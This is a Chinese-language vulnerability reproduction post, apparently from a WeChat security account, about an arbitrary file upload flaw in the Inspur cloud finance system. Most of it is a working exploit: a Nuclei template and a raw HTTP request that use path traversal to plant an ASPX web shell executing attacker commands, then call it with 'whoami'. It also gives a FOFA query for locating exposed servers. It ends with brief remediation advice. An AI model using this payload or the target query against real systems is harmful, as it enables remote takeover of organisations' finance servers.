漏洞描述:
浪潮云财务系统UploadListFile存在任意文件上传漏洞。攻击者可通过上传恶意文件,使恶意文件被执行,从而导致系统被入侵或遭受其他安全风险。
01—Nuclei POC
id: langchaoyun-UploadListFile-UploadFile
info:
name: 浪潮云财务系统UploadListFile存在任意文件上传漏洞
author: kingkong
severity: high
metadata:
fofa-query: body="/cwbase/web/scripts/jquery.js" || icon_hash="-1341069524"
http:
- raw:
- |
POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: /
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------rww5upkbw6ctf0tu5hye
-----------------------------rww5upkbw6ctf0tu5hye
Content-Disposition: form-data; name="file"; filename="../../../../../../rce.aspx"
Content-Type: image/png
<%@ Page Language="Jscript" validateRequest="false" %>
<%
var c=new System.Diagnostics.ProcessStartInfo("cmd");
var e=new System.Diagnostics.Process();
var out:System.IO.StreamReader,EI:System.IO.StreamReader;
c.UseShellExecute=false;
c.RedirectStandardOutput=true;
c.RedirectStandardError=true;
e.StartInfo=c;
c.Arguments="/c " + Request.Item["cmd"];
e.Start();
out=e.StandardOutput;
EI=e.StandardError;
e.Close();
Response.Write(out.ReadToEnd() + EI.ReadToEnd());
System.IO.File.Delete(Request.PhysicalPath);
Response.End();%>
-----------------------------rww5upkbw6ctf0tu5hye--
- |
GET /cwbase/rce.aspx?cmd=whoami HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'status_code_2 == 200'
condition: and
02—搜索语法
FOFA:body="/cwbase/web/scripts/jquery.js" || icon_hash="-1341069524"
界面如下
03—漏洞复现
访问路径并执行命令
漏洞检测POC
POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: /
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------rww5upkbw6ctf0tu5hye
-----------------------------rww5upkbw6ctf0tu5hye
Content-Disposition: form-data; name="file"; filename="../../../../../../rce.aspx"
Content-Type: image/png
<%@ Page Language="Jscript" validateRequest="false" %>
<%
var c=new System.Diagnostics.ProcessStartInfo("cmd");
var e=new System.Diagnostics.Process();
var out:System.IO.StreamReader,EI:System.IO.StreamReader;
c.UseShellExecute=false;
c.RedirectStandardOutput=true;
c.RedirectStandardError=true;
e.StartInfo=c;
c.Arguments="/c " + Request.Item["cmd"];
e.Start();
out=e.StandardOutput;
EI=e.StandardError;
e.Close();
Response.Write(out.ReadToEnd() + EI.ReadToEnd());
System.IO.File.Delete(Request.PhysicalPath);
Response.End();%>
-----------------------------rww5upkbw6ctf0tu5hye--
GET /cwbase/rce.aspx?cmd=whoami HTTP/1.1
Host:
neclei批量检测截图
04—修复建议
1、文件类型验证:仅允许上传特定类型的文件,例如图像、文档等,并拒绝可执行文件或其他潜在的恶意文件类型。
2、文件大小限制:限制上传文件的大小,以防止恶意用户上传过大的文件导致服务器资源耗尽。
3、文件名处理:对上传的文件进行重命名,避免使用用户提供的文件名,以防止路径遍历攻击。
05—下载地址
原文始发于微信公众号(脚本小子):浪潮云财务系统UploadListFile接口处存在任意文件上传漏洞【漏洞复现|附nuclei-POC】
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论